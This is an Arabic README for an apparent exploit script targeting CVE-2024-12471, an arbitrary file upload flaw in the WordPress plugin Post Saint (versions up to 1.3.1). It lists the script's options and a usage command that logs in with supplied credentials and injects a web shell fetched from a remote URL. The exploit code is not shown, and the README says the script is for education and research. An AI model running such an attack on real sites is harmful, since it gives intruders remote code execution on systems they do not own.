
إضافة Post Saint <= 1.3.1 لـ WordPress: رفع ملف تعسفي
إضافة Post Saint <= 1.3.1 لووردبريس ثغرة رفع ملفات عشوائية
إن إضافة Post Saint لووردبريس (الإصدارات حتى 1.3.1) معرضة لثغرة رفع ملفات عشوائية بسبب عدم وجود فحوصات الصلاحيات والتحقق من نوع الملف. يمكن للمهاجمين الموثقين الذين لديهم على الأقل صلاحيات مشترك استغلال هذه الثغرة لرفع ملفات عشوائية، مما قد يؤدي إلى تنفيذ أكواد عن بعد.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
هذا السكريبت لأغراض تعليمية وبحثية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو غير قانوني وغير أخلاقي.